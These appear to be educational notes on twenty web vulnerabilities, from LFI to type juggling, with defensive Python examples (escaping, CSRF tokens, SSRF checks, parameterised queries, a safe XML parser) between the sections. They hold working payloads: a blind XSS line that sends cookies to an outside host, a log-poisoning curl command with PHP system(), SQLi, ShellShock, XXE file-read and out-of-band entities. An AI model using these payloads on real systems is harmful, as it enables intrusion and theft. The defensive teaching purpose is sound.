
Notes on the Most Common Web Vulnerabilities

1. Local File Inclusion (LFI)

Allows an attacker to include local server files, typically via vulnerable parameters:

  • https://localhost/myweb.php?idioma=es → https://localhost/myweb.php?idioma=/etc/passwd

Evasion and tricks:

  • If it only allows .txt, try null byte injection: https://localhost/myweb.php?language=/etc/passwd%00.txt
    %00 terminates the string before .txt is appended internally (old PHP trick; may still work on legacy environments).
  • If restricted to a specific path (/var/www/html/lang/) → path traversal: https://localhost/myweb.php?language=../../../../../../etc/passwd
    Also try the encoded dot (%2e) or combinations like %2e%2e/ to bypass filters.

2. Wrappers

PHP has "wrappers" like php://input or data:// that allow accessing streams as if they were files:

  • php://input → Access the request body (POST)
  • data:// → Execute embedded data as a file
  • file:// → Access local files
  • zip://, phar://, glob://, etc.

With php://input the request body becomes the included "file", so PHP code sent in the POST body runs on the server.
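Sections 1 and 2 both come down to one root cause: a user-supplied value reaches include(). The following Python is an added example (not code from the page) of how the receiving side should handle that parameter. It assumes a hypothetical language directory /srv/app/lang and an allowlist {es, en, fr}; both are constructed for the example. The allowlist is the actual fix; the canonical-path containment check is defence in depth for code that genuinely needs a user-chosen file name, and the scheme check refuses the wrappers and remote URLs listed above.

```python
import os
from urllib.parse import unquote
from typing import Optional

# Constructed for this example: the only directory the page may read from and the
# fixed set of language files the application ships.
LANG_DIR = "/srv/app/lang"
ALLOWED_LANGS = {"es", "en", "fr"}

# Stream-wrapper and remote schemes that an include() argument must never start with
WRAPPER_SCHEMES = ("php:", "data:", "file:", "zip:", "phar:", "glob:",
                   "http:", "https:", "ftp:")


def confine_path(base_dir: str, relative: str) -> Optional[str]:
    """Join `relative` onto `base_dir`, canonicalise, and return the result only if it is
    still inside `base_dir`. ../ sequences and absolute paths are both collapsed by
    realpath() before the containment check, so neither can escape."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, relative))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def resolve_language_file(requested: str) -> Optional[str]:
    """Map the user-supplied `language` parameter to a file path, or None if refused.

    Layer 1 (the real fix): an exact allowlist of names, so neither traversal nor a
    wrapper URL can ever reach include().
    Layer 2 (defence in depth): canonical containment inside LANG_DIR."""
    name = unquote(requested)                  # decode once, as the web server would
    if "\x00" in name:                         # null byte: the %00 truncation trick
        return None
    if name.lower().startswith(WRAPPER_SCHEMES):
        return None
    if name not in ALLOWED_LANGS:
        return None
    return confine_path(LANG_DIR, name + ".txt")
```

Note that confine_path() is only as good as the decoding that happens before it: decode exactly once, the same way the server does, or a double-encoded %252e%252e slips past a check that sees only the first layer.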


3. Log Poisoning

With LFI, you can enumerate log files (mostly in /var/log).
If you find access logs, you can execute commands by injecting PHP code into your own requests (for example in the User-Agent header): the server writes it to the log, and it runs when the log file is included.

curl -s -H "User-Agent: <?php system('whoami'); ?>" "http://localhost/myweb.php?file=/var/log/apache2/access.log"

4. Remote File Inclusion (RFI)

Similar to LFI but allows including remote files, like malicious scripts. Be careful, it only works if allow_url_include is enabled.


5. HTML Injection

Inject HTML (not JavaScript) into a page. Does not execute JS but can be used for phishing or DOM manipulation.

<b>¡Hola admin!</b><form action="...">

It may also allow <img src="javascript:..."> or a trap <form>.


6. Cross-Site Scripting (XSS)

JavaScript injection in web pages. Allows you to:

  • Steal cookies
  • Hijack sessions
  • Modify the DOM
  • Redirect the user

Classic example: <script>alert('XSS');</script>


7. Blind XSS

Similar to XSS, but the payload executes elsewhere (e.g., an admin panel). Example, inject:

<script>fetch('https://tuyo.com?c='+document.cookie)</script>

You won't see anything yourself, but when the admin opens the page, their cookie is sent to you.
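Sections 5 to 7 share one fix: encode output for the context it lands in, and keep session cookies out of reach of scripts. The following Python is an added example (not from the page) of context-aware escaping for a server-rendered response: HTML text, a quoted attribute, a URL in href/src (where javascript: has to be refused, not escaped), and a string inside a <script> block. The render_greeting() template and the cookie name "session" are constructed for the example. The HttpOnly flag is what makes the document.cookie exfiltration above return nothing.

```python
import html
import json


def escape_html_text(value: str) -> str:
    """Text between tags: <b>, <script> and <form> all become inert entities."""
    return html.escape(value, quote=True)


def escape_html_attr(value: str) -> str:
    """Inside a double-quoted attribute: quote=True stops the value closing the attribute."""
    return html.escape(value, quote=True)


def escape_js_string(value: str) -> str:
    """Inside a <script> string literal: JSON-encode, then escape < and > so a value
    containing </script> cannot terminate the script block early."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def safe_url(value: str) -> str:
    """For href/src: only http(s) and site-relative URLs survive. javascript:, data: and
    protocol-relative //host URLs are replaced by a harmless anchor, because escaping a
    URL does not make its scheme safe."""
    v = value.strip()
    lowered = v.lower()
    if lowered.startswith("//"):
        return "#"
    if lowered.startswith(("http://", "https://", "/")):
        return v
    return "#"


def render_greeting(username: str, next_url: str) -> str:
    """Each interpolation uses the escaper for its own context; raw input never appears."""
    return (
        f"<p>Hello {escape_html_text(username)}</p>"
        f'<a href="{escape_html_attr(safe_url(next_url))}">continue</a>'
        f"<script>var user = {escape_js_string(username)};</script>"
    )


def session_cookie_header(value: str) -> str:
    """HttpOnly keeps the cookie out of document.cookie; Secure and SameSite narrow it further."""
    return f"Set-Cookie: session={value}; HttpOnly; Secure; SameSite=Lax; Path=/"
```

A Content-Security-Policy header that disallows inline scripts is the usual second layer; it catches the cases where an escaper was forgotten.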


8. Cross-Site Request Forgery (CSRF)

Trick a logged-in user into performing actions unknowingly (change password, transfers). Example:

<img src="http://victima.com/change_password?new=1234" />

If the session is active, the password changes without consent. Solution: use CSRF tokens and verify methods (GET/POST).
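The two mitigations named above, worked through in Python as an added example (not code from the page): a token bound to the session by HMAC, verified in constant time, and a state-changing endpoint that refuses GET outright so the <img src=...> vector cannot trigger it. SERVER_SECRET and the handle_change_password() endpoint are constructed for the example; a real application loads the secret from configuration.

```python
import hashlib
import hmac
import secrets

# Constructed for this example; a real deployment loads this from configuration.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Token = nonce.HMAC(secret, session_id:nonce). Binding it to the session means a
    token captured from one user is useless for another, and the server stores nothing."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare without early exit."""
    try:
        nonce, mac = token.split(".", 1)
    except ValueError:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def handle_change_password(method: str, session_id: str, form: dict) -> int:
    """A state-changing endpoint; returns the HTTP status it would send.
    GET is refused (that is the <img src=...> vector) and POST must carry a token
    that matches the caller's own session."""
    if method != "POST":
        return 405
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403
    # the actual password change would happen here
    return 200
```

Setting SameSite=Lax or Strict on the session cookie adds a browser-side layer: cross-site image and form requests then arrive without the cookie at all.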


9. Server-Side Request Forgery (SSRF)

Use the server as a proxy to make requests that it can reach but you cannot: 127.0.0.1, internal networks, cloud metadata endpoints. Useful for scanning internal networks or reaching restricted services such as internal admin panels.
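The server-side check that closes most of this, as an added Python example (not from the page): before fetching a user-supplied URL, restrict the scheme, refuse credentials in the URL, resolve the hostname and reject it if any returned address is loopback, private, link-local (the 169.254.169.254 metadata range) or otherwise non-public. The resolver is injectable so the example runs offline; FAKE_DNS and its hostnames are constructed for the example, including a "rebind.example" name that mixes a public and a loopback record, which is why every address must pass rather than just the first.

```python
import ipaddress
import socket
from typing import Callable, List, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def system_resolver(host: str) -> List[str]:
    """Default resolver: every address the OS returns for the name."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


# Constructed for this example so the check runs offline: a stand-in for DNS.
FAKE_DNS = {
    "public.example": ["93.184.216.34"],
    "intranet.example": ["10.0.0.5"],
    "rebind.example": ["93.184.216.34", "127.0.0.1"],   # public and loopback mixed
}


def fake_resolver(host: str) -> List[str]:
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise OSError("NXDOMAIN")


def _is_public(ip) -> bool:
    if ip.version == 6 and ip.ipv4_mapped is not None:   # ::ffff:127.0.0.1 style
        ip = ip.ipv4_mapped
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def is_safe_outbound_url(url: str,
                         resolver: Callable[[str], List[str]] = system_resolver) -> Tuple[bool, str]:
    """Decide whether the server may fetch `url` on a user's behalf. Returns (ok, reason)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username or parts.password:
        return False, "userinfo not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = [str(ipaddress.ip_address(host))]      # literal IP: no lookup needed
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError:
            return False, "unresolvable host"
    if not addrs:
        return False, "unresolvable host"
    for a in addrs:
        if not _is_public(ipaddress.ip_address(a)):
            return False, f"resolves to non-public address {a}"
    return True, "ok"
```

The check is only meaningful if the fetch that follows connects to the address that was validated; resolving again at connection time reopens a rebinding window, and redirects from the fetched server must be run through the same check.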


10. SQL Injection / Error-Based

SQL injection that reveals useful errors for exploitation:

' OR 1=1 --

If errors are displayed, you can exfiltrate data easily:

' UNION SELECT null, version(), database() --

11. SQL Injection / Time-Based (Blind)

No visible errors, but you can infer responses using functions like SLEEP():

' OR IF(1=1, SLEEP(5), 0) --

If it delays 5 seconds, the injection worked (blind SQLi discovered).
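For sections 10 and 11 the defence is the same whether the injection is error-based or blind: the value must never become part of the statement text. The following Python is an added example (not from the page) that runs the page's own inputs against an in-memory SQLite table, constructed for the example, once through string formatting and once through a bound parameter. SQLite has no SLEEP(), so the time-based payload is only shown against the safe version, where it is merely a string that matches no username.

```python
import sqlite3


def _demo_db() -> sqlite3.Connection:
    """Constructed in-memory table for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return conn


CONN = _demo_db()


def vulnerable_lookup(username: str) -> list:
    """The bug: the value is pasted into the statement, so a quote in the input closes
    the literal and the rest is parsed as SQL. The trailing -- comments out the closing
    quote that the template adds."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in CONN.execute(sql)]


def safe_lookup(username: str) -> list:
    """The fix: a bound parameter. The driver sends the value separately from the
    statement, so the input is compared as a string and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in CONN.execute(sql, (username,))]
```

On the detection side, a query whose execution time jumps by a round number of seconds while its text contains SLEEP, BENCHMARK or pg_sleep is the usual signature of section 11 in database logs.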


12. Padding Oracle Attack (Padbuster)

Attack against block ciphers (like CBC) using errors to deduce padding and decrypt info. If an encrypted cookie produces different errors depending on padding, it can be decrypted byte by byte. Classic tool: padbuster.pl.


13. Padding Oracle Attack (Bit Flipper / BurpSuite)

Same idea as Padding Oracle, but instead of decrypting, you modify content → flip bits in the ciphertext to force a specific result (like privilege escalation). Example: change user=normal to user=admin by flipping bits until the decrypted data grants elevated privileges.
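Sections 12 and 13 are both defeated by the same construction, shown here in Python as an added example (not from the page): authenticate the IV and ciphertext with an HMAC, verify the tag before anything is decrypted or unpadded, and collapse every failure (wrong length, bad tag, bad padding) into one indistinguishable error. The block cipher itself is out of scope, so decryption is a labelled identity stand-in; the MAC key, the cookie contents and the helpers rejects() and flip_byte() are constructed for the example. With this ordering a flipped bit is refused before it ever reaches the padding check, so there is no oracle to query and no way to steer the plaintext.

```python
import hashlib
import hmac

BLOCK = 16     # CBC block size of the cookie's cipher
MAC_LEN = 32   # HMAC-SHA256 tag length


class InvalidToken(Exception):
    """The single error the caller can observe, whatever actually went wrong."""


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    """Padding check that reports nothing specific: same exception as every other failure."""
    if not data or len(data) % BLOCK:
        raise InvalidToken
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise InvalidToken
    return data[:-n]


def seal(mac_key: bytes, iv_and_ciphertext: bytes) -> bytes:
    """Encrypt-then-MAC: the tag covers IV and ciphertext, so any flipped bit is detected."""
    tag = hmac.new(mac_key, iv_and_ciphertext, hashlib.sha256).digest()
    return iv_and_ciphertext + tag


def open_sealed(mac_key: bytes, blob: bytes, decrypt) -> bytes:
    """Verify first, decrypt and unpad second. A tampered or truncated blob never reaches
    the cipher or the padding check."""
    if len(blob) < MAC_LEN + BLOCK:
        raise InvalidToken
    body, tag = blob[:-MAC_LEN], blob[-MAC_LEN:]
    expected = hmac.new(mac_key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise InvalidToken
    return pkcs7_unpad(decrypt(body))


def stub_decrypt(body: bytes) -> bytes:
    """Stand-in for CBC decryption (assumption: identity) so the surrounding logic stays visible."""
    return body


def rejects(mac_key: bytes, blob: bytes) -> bool:
    """True if the blob is refused; every kind of tampering looks the same from outside."""
    try:
        open_sealed(mac_key, blob, stub_decrypt)
        return False
    except InvalidToken:
        return True


def flip_byte(blob: bytes, index: int) -> bytes:
    """Flip one bit of the blob, the edit that bit-flipper tooling makes."""
    out = bytearray(blob)
    out[index] ^= 0x01
    return bytes(out)
```

Where a library offers an AEAD mode (AES-GCM, ChaCha20-Poly1305), prefer it over hand-assembling CBC plus HMAC; it gives the same property without the chance of getting the order wrong.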


14. ShellShock

Bash vulnerability allowing command execution via environment variables. Affects old CGI servers:

User-Agent: () { :; }; /bin/bash -c 'id'
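Both the log poisoning of section 3 and the ShellShock header above leave their payload in the attacker-controlled fields of the web server's own access log, so one pass over the log catches both. The following Python is an added example (not from the page) of that detection: a parser for the Apache/nginx combined format and a small rule set run over four constructed sample lines (not from any real server). The pattern deliberately ignores that real servers escape embedded quotes as \" inside a field; the page's payloads only use single quotes, so the simplification holds for them.

```python
import re
from typing import Dict, List, Optional

# Apache/nginx "combined" format. Simplification for this example: real servers escape
# embedded quotes as \" inside fields, which this pattern does not handle.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# What to look for in the attacker-controlled fields (request line, Referer, User-Agent)
RULES = {
    "php-tag-in-request": re.compile(r"<\?(php|=)", re.I),      # log poisoning payload
    "shellshock-function-def": re.compile(r"\(\)\s*\{"),        # "() {" in a header
    "log-file-in-query": re.compile(r"/var/log/", re.I),       # a log being included via LFI
    "traversal-in-query": re.compile(r"(\.\./|%2e%2e|\.\.%2f)", re.I),
}

# Constructed sample lines for this example (not from any real server)
SAMPLE_LOG = [
    '10.0.0.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?language=es HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /myweb.php?file=/var/log/apache2/access.log HTTP/1.1" 200 4096 "-" "<?php system(\'whoami\'); ?>"',
    '10.0.0.9 - - [10/Oct/2023:13:57:12 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "-" "() { :; }; /bin/bash -c \'id\'"',
    '10.0.0.3 - - [10/Oct/2023:13:58:40 +0000] "GET /myweb.php?language=%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 210 "-" "curl/7.88.1"',
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def classify(line: str) -> List[str]:
    """Names of every rule that fires on the line; ['unparsed'] if the format is off."""
    rec = parse_line(line)
    if rec is None:
        return ["unparsed"]
    hits = []
    for name, rx in RULES.items():
        if any(rx.search(rec[field]) for field in ("request", "referer", "ua")):
            hits.append(name)
    return hits


def scan(lines: List[str]) -> List[List[str]]:
    return [classify(line) for line in lines]
```

A request that both includes a log file and carries a PHP tag in the same session, as the second sample line does, is the poisoning attempt itself; a 500 on a CGI path with a function-definition header is the ShellShock probe whether or not it succeeded.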

15. XML External Entity Injection (XXE)

Attack XML parsers that allow defining external entities, letting you read files or perform SSRF. Dangerous for SOAP/XML APIs:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>&xxe;</root>

16. Blind XXE

Like XXE, but you don’t see the response. Use a side channel, such as forcing DNS requests:

<!ENTITY % ext SYSTEM "http://tuo.dominio.com/pwn">
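For sections 15 and 16 the parser configuration is the fix, and it is the same whether the exfiltration is direct or through a side channel: never let a DOCTYPE through, never expand parameter entities, never fetch an external entity. The following Python is an added example (not from the page) built on the standard library's expat binding with all three guards, returning a small result for well-formed input and a rejection for anything carrying entity declarations. The parse_untrusted_xml() and try_parse() names are constructed for the example.

```python
import xml.parsers.expat
from typing import Dict, Tuple, Union


class UnsafeXML(Exception):
    """Raised as soon as a DOCTYPE appears: that is where <!ENTITY ...> lives."""


def parse_untrusted_xml(data: str) -> Dict[str, str]:
    """Parse with entity handling switched off; return the root tag and its text.
    Three independent guards: a DOCTYPE aborts the parse, parameter entities are never
    expanded, and any external entity reference is refused."""
    parser = xml.parsers.expat.ParserCreate()
    state = {"root": None, "text": []}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE '{name}' not allowed in untrusted input")

    def on_external_entity(context, base, system_id, public_id):
        return 0     # tell expat to stop; never fetch file:// or http:// entities

    def on_start(name, attrs):
        if state["root"] is None:
            state["root"] = name

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = state["text"].append
    parser.Parse(data, True)
    return {"root": state["root"], "text": "".join(state["text"])}


def try_parse(data: str) -> Tuple[str, Union[Dict[str, str], str]]:
    """('ok', result) or ('rejected', reason); malformed XML is rejected as well."""
    try:
        return "ok", parse_untrusted_xml(data)
    except UnsafeXML as e:
        return "rejected", str(e)
    except xml.parsers.expat.ExpatError as e:
        return "rejected", f"malformed: {e}"
```

On the network side, the blind variant is visible as outbound DNS or HTTP from an application server that has no business resolving arbitrary names; egress filtering for that tier turns a silent leak into a logged failure.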

17. Domain Zone Transfer (AXFR)

Obtain the full DNS zone of a domain if the DNS server is misconfigured:

dig axfr @dns.victima.com victima.com

18. Deserialization Attacks

Send serialized data (PHP, Java, Python objects) that executes code when deserialized. PHP example:

O:7:"Exploit":1:{s:4:"data";s:16:"<?php info(); ?>";}
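The defensive counterpart, as an added Python example (not from the page): a deserializer that refuses to reconstruct anything but plain data containers. Python's pickle resolves every class or function reference through find_class(), so overriding it with an allowlist is the direct analogue of PHP's unserialize($s, ['allowed_classes' => [...]]). SAMPLE_PROFILE and SAMPLE_GLOBAL_REF are constructed inputs; the second references the harmless built-in len only to show that the same opcode an attacker would use to name something dangerous is refused regardless of what it names.

```python
import builtins
import io
import pickle
from typing import Any, Tuple

# Only plain data containers may be rebuilt: no functions, no classes with side effects.
SAFE_BUILTINS = {"set", "frozenset", "list", "dict", "tuple", "bytes", "str", "int", "float", "bool"}


class RestrictedUnpickler(pickle.Unpickler):
    """Every GLOBAL / STACK_GLOBAL opcode goes through find_class; refuse anything off
    the allowlist. Python analogue of PHP's allowed_classes option."""

    def find_class(self, module: str, name: str) -> Any:
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes) -> Any:
    return RestrictedUnpickler(io.BytesIO(data)).load()


def loads_or_reject(data: bytes) -> Tuple[str, Any]:
    try:
        return "ok", restricted_loads(data)
    except pickle.UnpicklingError as e:
        return "rejected", str(e)


# Constructed inputs for this example.
SAMPLE_PROFILE = pickle.dumps({"user": "alice", "roles": ["user"], "tags": {"a", "b"}})
SAMPLE_GLOBAL_REF = pickle.dumps(len)   # harmless callable; the opcode is what matters
```

The better answer for data that crosses a trust boundary is a format with no code-loading semantics at all (JSON with a schema check); the allowlist is for the cases where the native format cannot be replaced.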

19. Type Juggling

Exploit how PHP (or other languages) compares values of different types (strings vs ints):

if ($_POST['auth'] == "0e12345") // vulnerable

Result: authentication bypass whenever a submitted value compares equal under loose comparison.
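Why the comparison above is bypassable, and what replaces it, as an added Python example (not from the page). php_loose_equals() is a simplified model of PHP's == between two strings: when both look numeric they are compared as numbers, so "0e12345" and any other "0e" followed by digits are both zero and compare equal. The NUMERIC_STRING grammar is an assumption (close enough to show the class of inputs involved; PHP's real rules have more corner cases). check_auth_token() is the fix: a strict, constant-time comparison, the equivalent of === or hash_equals() in PHP.

```python
import hmac
import re

# Simplified model of PHP's "numeric string" grammar: optional surrounding whitespace,
# sign, digits with optional fraction, optional exponent. Assumption for this example.
NUMERIC_STRING = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_equals(a: str, b: str) -> bool:
    """Model of PHP's == for two strings: numeric strings compare as numbers, otherwise
    the comparison is by characters. "0e12345" == "0e99999" is true because both are 0.0."""
    if NUMERIC_STRING.match(a) and NUMERIC_STRING.match(b):
        return float(a) == float(b)
    return a == b


def php_strict_equals(a: str, b: str) -> bool:
    """Model of ===: same type and same characters, no numeric conversion."""
    return a == b


def check_auth_token(submitted: str, expected: str) -> bool:
    """The fix: strict and constant-time, so neither type juggling nor timing leaks apply.
    PHP equivalent: hash_equals($expected, $submitted)."""
    return hmac.compare_digest(submitted.encode(), expected.encode())
```

The same trap applies to hashes stored as hex strings: a digest that happens to start with "0e" and continue with digits is a numeric string, which is why md5($x) == md5($y) is unsafe and a strict comparison is mandatory.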


20. Virtual Hosting

Multiple websites (virtual hosts) can be served from the same IP address and port, selected by the Host header of the request. To enumerate them, you can use tools like wfuzz.